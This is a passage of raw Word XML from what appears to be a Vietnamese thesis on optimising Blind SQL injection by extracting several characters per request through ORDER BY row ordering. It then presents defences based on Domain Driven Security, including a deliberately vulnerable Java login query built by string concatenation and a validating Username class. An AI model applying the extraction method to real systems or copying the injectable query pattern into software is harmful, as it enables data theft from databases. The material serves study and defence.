        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t># Khởi tạo biến @hbn bằng 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>from  (select @hbn:=0) as t)</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1F9BCABF" wp14:editId="36BDC5B9">
            <wp:extent cx="5268596" cy="25146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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5275555" cy="2517921"/>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86" w:name="_Toc459819449"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Sử dụng biến, thay thế sử dụng cột id</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc459822514"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Mở rộng</w:t>
      </w:r>
      <w:r w:rsidR="00FF02A4" w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> trong tấn công Blind SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Phương pháp có thể mở rộng theo 02 hướng. Hướng mở rộng </w:t>
      </w:r>
      <w:r w:rsidR="002D3C6B" w:rsidRPr="005D3C52">
        <w:t>đầu tiên</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> là lấy nhiều hơn 1 ký tự trong một lần yêu cầu. Để lấy 1 ký tự sẽ cần 7 dòng (cho 7 bit) và 1 dòng làm mốc. Ở ký tự thứ hai chỉ cần them 7 dòng để hiển thị 7 bit tiếp theo. Với m số ký tự cần lấy, thì số dòng cần để hiển thị là 7*m+1. Ví dụ sau sẽ lấy 02 ký tự trong một yêu cầ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14:anchorId="295716DC" wp14:editId="0D14C8CC">
            <wp:extent cx="5686107" cy="39147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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5692507" cy="3919182"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="004F69FA" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc459819450"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> Lấy nhiều hơn một ký tự trong một yêu cầu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Đối với 7 cột đầu tiên (từ 2 đến 8), có 4 và 5 xuất hiện trước cột 1 nên thứ tự bit của ký tự đầu tiên là: 4 5 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> 2 3 4 7. Tương tự ở trên, ký tự đầu tiên là ‘s’. Đối với 7 cột tiếp theo (từ 9 đến 15), có 10 11 12 xuất hiện trước 1 nên thứ tự bit của ký tự thứ hai là: 10 11 12 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> 9 13 14 15, cho vào bảng ánh xạ:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2616" w:rsidRPr="000B2616" w:rsidRDefault="000B2616" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc459803834"/>
      <w:r w:rsidRPr="000B2616">
        <w:t xml:space="preserve">Bảng </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="00313D3F">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Bảng \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="000B2616">
        <w:t>: Bảng chuyển đổi giữa thứ tự và mã ASCII của ký tự thứ hai lấy được</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>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9</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5</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9)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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0B2616">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Mã ASCI của ký tự là 113, tương ứng với ký tự ‘q’. Lưu ý là số bit cần dịch sẽ là n-9 vì phải trừ th</w:t>
      </w:r>
      <w:r w:rsidR="00F86F13">
        <w:t>ê</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t>m 7 bit cho ký tự đầu tiên.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D665C" w:rsidRDefault="002D3C6B" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Một là hướng khác là mở rộng sang các tấn công Blind SQL injection truyền thống. Vì mệnh đề ORDER BY nằm sau mệnh đề WHERE, là mệnh đề thường xuyên mắc lỗi SQL injection nên hoàn toàn có thể áp dụng phương pháp </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">này. Chỉ cần kết quả trả có </w:t>
      </w:r>
      <w:r w:rsidR="001D665C">
        <w:t xml:space="preserve">từ </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t>8 dòng trở lên</w:t>
      </w:r>
      <w:r w:rsidR="001D665C">
        <w:t xml:space="preserve"> hoàn toàn có thể áp dụng phương pháp này để thực hiện tối ưu hóa tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D665C" w:rsidRPr="00757273" w:rsidRDefault="00E2762E" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Điều đó cho phép tối ưu hóa tấn công Blind SQL injection, từ đó giúp tăng tốc độ tấn công, cũng như tiết kiệm thời gian, băng thông của cuộc tấn công. </w:t>
      </w:r>
      <w:r w:rsidR="006D6FC6">
        <w:t xml:space="preserve">Đa số các mệnh đề SQL được cộng phía sau mệnh đề WHERE, mà mệnh đề ORDER BY phía sau nên hoàn toàn có thể sử dụng được. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc459822515"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Giải pháp phòng chống tấn</w:t>
      </w:r>
      <w:r w:rsidR="002B02EF" w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> công SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
      <w:r w:rsidR="002B02EF" w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E93309" w:rsidRPr="00BF58E1" w:rsidRDefault="00E93309" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Các phần trên luận văn đã trình bày các phương pháp tấn công và tối ưu hóa tấn công Blind SQL injection. Tuy nhiên, một câu hỏi được đặt ra làm thế nào để phòng tránh, cũng như khắc phục lỗ hổng này. Làm thế nào có thể ngăn chặn lỗ hổng này, ngay cả khi đó là một ứng dụng dễ dàng mắc lỗi SQL injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E93309" w:rsidRPr="00E93309" w:rsidRDefault="00E93309" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Trong phần này, luận văn sẽ trình bày về các phương pháp phòng chống lỗ hổng SQL injection nói chung, cũng như phương pháp áp dụng trong trường hợp sử dụng kỹ thuật tối ưu này.</w:t>
      </w:r>
      <w:r w:rsidR="00C40E72">
        <w:t xml:space="preserve"> Các phương pháp này gồm các kỹ thuật lập trình an toàn, có liên quan đến SQL injection. </w:t>
      </w:r>
      <w:r w:rsidR="004D72F3">
        <w:t xml:space="preserve">Đây là các phương pháp giúp nhà phát triển, lập trình viên có thể giảm thiểu được các cuộc tấn công. </w:t>
      </w:r>
      <w:r w:rsidR="00D14C13">
        <w:t>Đặc biệt, luận văn đi sâu vào phương pháp để tạo ra chuỗi string động đảm bảo an toàn, phòng chống được tấ</w:t>
      </w:r>
      <w:r w:rsidR="00F97590">
        <w:t>n công SQL injection, cũng như các phương pháp xử lý đầu vào phù hợp với người dùng. Liên quan đến các kỹ thuật xử lý đầu vào, phần này cũng trình bày các kỹ thuật xử lý đầu ra liên quan. Cuối cùng trong phần này luận văn sẽ trình bày về các thiết kế giúp nâng cao độ an toàn của ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003006E8" w:rsidRPr="00763A7E" w:rsidRDefault="00B4125E" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc458409301"/>
      <w:bookmarkStart w:id="92" w:name="_Toc458409371"/>
      <w:bookmarkStart w:id="93" w:name="_Toc458433497"/>
      <w:bookmarkStart w:id="94" w:name="_Toc459373914"/>
      <w:bookmarkStart w:id="95" w:name="_Toc459373974"/>
      <w:bookmarkStart w:id="96" w:name="_Toc459374347"/>
      <w:bookmarkStart w:id="97" w:name="_Toc459822516"/>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="94"/>
      <w:bookmarkEnd w:id="95"/>
      <w:bookmarkEnd w:id="96"/>
      <w:r w:rsidRPr="00763A7E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sử dụng Domain Driven Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w:rsidR="00B05040" w:rsidRDefault="00B4125E" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B4125E">
        <w:t>Domain Driven Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (DDS) </w:t>
      </w:r>
      <w:r w:rsidR="00412534">
        <w:t xml:space="preserve">là phương pháp tiếp cận cơ bản nhất để phòng tránh các lỗ hổng dạng injection nói chung. Nếu như nhìn kỹ vào </w:t>
      </w:r>
      <w:r w:rsidR="00F7715B">
        <w:t xml:space="preserve">các đoạn </w:t>
      </w:r>
      <w:r w:rsidR="008E1FF3">
        <w:t>mã nguồn</w:t>
      </w:r>
      <w:r w:rsidR="00F7715B">
        <w:t xml:space="preserve"> mắc lỗi SQL injection sẽ thấy rằng cách xử lý tương đối giống nhau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B93CAD" w:rsidRPr="00B93CAD" w:rsidTr="00B93CAD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B93CAD" w:rsidRPr="00B93CAD" w:rsidRDefault="00B93CAD" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B93CAD">
              <w:lastRenderedPageBreak/>
              <w:t>public boolean isValidPassword(String username, String password) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B93CAD" w:rsidRPr="009F090B" w:rsidRDefault="009F090B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidR="00B93CAD" w:rsidRPr="00B93CAD">
              <w:t xml:space="preserve">String sql = “SELECT </w:t>
            </w:r>
            <w:r w:rsidR="00B93CAD" w:rsidRPr="00B93CAD">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidR="00B93CAD" w:rsidRPr="00B93CAD">
              <w:t xml:space="preserve"> FROM user WHERE username=’” + username + “’ AND password=’” +</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B93CAD" w:rsidRPr="00B93CAD">
              <w:t>password + “’”;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B93CAD" w:rsidRPr="00B93CAD" w:rsidRDefault="009F090B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidR="00B93CAD" w:rsidRPr="00B93CAD">
              <w:t>Result result = query(sql);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B93CAD" w:rsidRPr="00B93CAD" w:rsidRDefault="009F090B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidR="00B93CAD" w:rsidRPr="00B93CAD">
              <w:t>...</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B93CAD" w:rsidRPr="00B93CAD" w:rsidRDefault="00B93CAD" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B93CAD">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F7715B" w:rsidRDefault="00350793" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dễ thấy rằng việc xử lý đầu vào là sai, đang mắc lỗi. Trong hầu hết các ứng dụng, đầu vào từ người dùng thường có các ràng buộc cụ thể: độ dài, loại ký tự. Tuy nhiên trong đoạn mã nguồn trên hoàn toàn không thấy có sự kiểm soát này. </w:t>
      </w:r>
      <w:r w:rsidR="00091C83">
        <w:t xml:space="preserve">DDS được phát triển dựa trên </w:t>
      </w:r>
      <w:r w:rsidR="00091C83" w:rsidRPr="00091C83">
        <w:t>Domain Driven Design (DDD)</w:t>
      </w:r>
      <w:r w:rsidR="00091C83">
        <w:t>, bằng cách đưa ra các điều kiện, ràng buộc dựa trên nghiệp vụ của ứng dụ</w:t>
      </w:r>
      <w:r w:rsidR="007D081B">
        <w:t xml:space="preserve">ng, và sử dụng trong mô hình miền (Domain Model). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2208A" w:rsidRDefault="00D2208A" w:rsidP="001B68FE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7167E989" wp14:editId="3A772C26">
            <wp:extent cx="3344090" cy="3211373"/>
            <wp:effectExtent l="19050" t="0" r="87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344293" cy="3211568"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00470368" w:rsidRDefault="00D2208A" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trong hình trên thể hiện quá trình ánh xạ dữ liệu giữa các thành phần trong ứng dụng. </w:t>
      </w:r>
      <w:r w:rsidR="005D256F">
        <w:t>Có 03 cách đại diện của username. ở thành phần Browser, thì được nhận diện là dạng chuỗi (string)</w:t>
      </w:r>
      <w:r w:rsidR="00470368">
        <w:t>, tiếp tục là string ở lớp server side và một dạng dữ liệu ở phía máy chủ cơ sở dữ liệu.</w:t>
      </w:r>
      <w:r w:rsidR="00BB2579">
        <w:t xml:space="preserve"> Nếu như ánh xạ như vậy, với chuỗi admin thì hoàn toàn đúng, còn với chuỗi bên tay phải thì sẽ kết thúc với một dữ liệu hoàn toàn khác từ trình duyệt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F6601" w:rsidRDefault="009F6601" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Rõ ràng username và password đều là các thành phần tiềm ẩn</w:t>
      </w:r>
      <w:r w:rsidR="003E593C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003E593C" w:rsidRPr="00091C83">
        <w:t>DDD</w:t>
      </w:r>
      <w:r w:rsidR="003E593C">
        <w:t xml:space="preserve"> cung cấp các phương hướng, phân loại dữ liệu rõ ràng. </w:t>
      </w:r>
      <w:r w:rsidR="00254900">
        <w:t xml:space="preserve">Trong ngôn ngữ Java, có thể tạo ra một lớp đối tượng </w:t>
      </w:r>
      <w:r w:rsidR="00EE4B21">
        <w:t xml:space="preserve">username </w:t>
      </w:r>
      <w:r w:rsidR="00254900">
        <w:t>như sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A65033" w:rsidRPr="00A65033" w:rsidTr="00A65033">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:t>public class Username {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>private static Pattern USERNAME_PATTERN = Pattern.compile(“^[a-z]{4,20}$”);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>private final String username;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>public Username(String username) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>if (!isValid(username)) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>throw new IllegalArgumentException(“Invalid username: ” + username);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>this.username = username;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>public static boolean isValid(String username) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>return USERNAME_PATTERN.matcher(username).matches();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A65033" w:rsidRPr="00A65033" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00254900" w:rsidRDefault="00187A14" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Đầu vào thô từ người dùng sẽ được đóng gói, và thực hiện kiểm tra</w:t>
      </w:r>
      <w:r w:rsidR="00B73288">
        <w:t xml:space="preserve"> đầu vào. Với bất kỳ dữ liệu nào cũng phải đảm bảo quy tắc dữ liệu này. Không có cách nào tạo ra một username không hợp lệ. </w:t>
      </w:r>
      <w:r w:rsidR="000F595C">
        <w:t>phương pháp này cũng đem lại sự đơn giản hóa trong việc kiểm tra, thực hiện tại một vị trí cơ bả</w:t>
      </w:r>
      <w:r w:rsidR="009733F8">
        <w:t xml:space="preserve">n, cũng như đơn giản việc tìm kiếm hàm kiểm tra trong quá trình phát triển. </w:t>
      </w:r>
      <w:r w:rsidR="00A970BE">
        <w:t>Sau khi áp dụng phương pháp này, quá trình xử lý đầu vào được mô tả như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2208A" w:rsidRDefault="00A970BE" w:rsidP="000A3157">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08E57F8E" wp14:editId="675B2494">
            <wp:extent cx="3398215" cy="328452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398104" cy="3284417"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
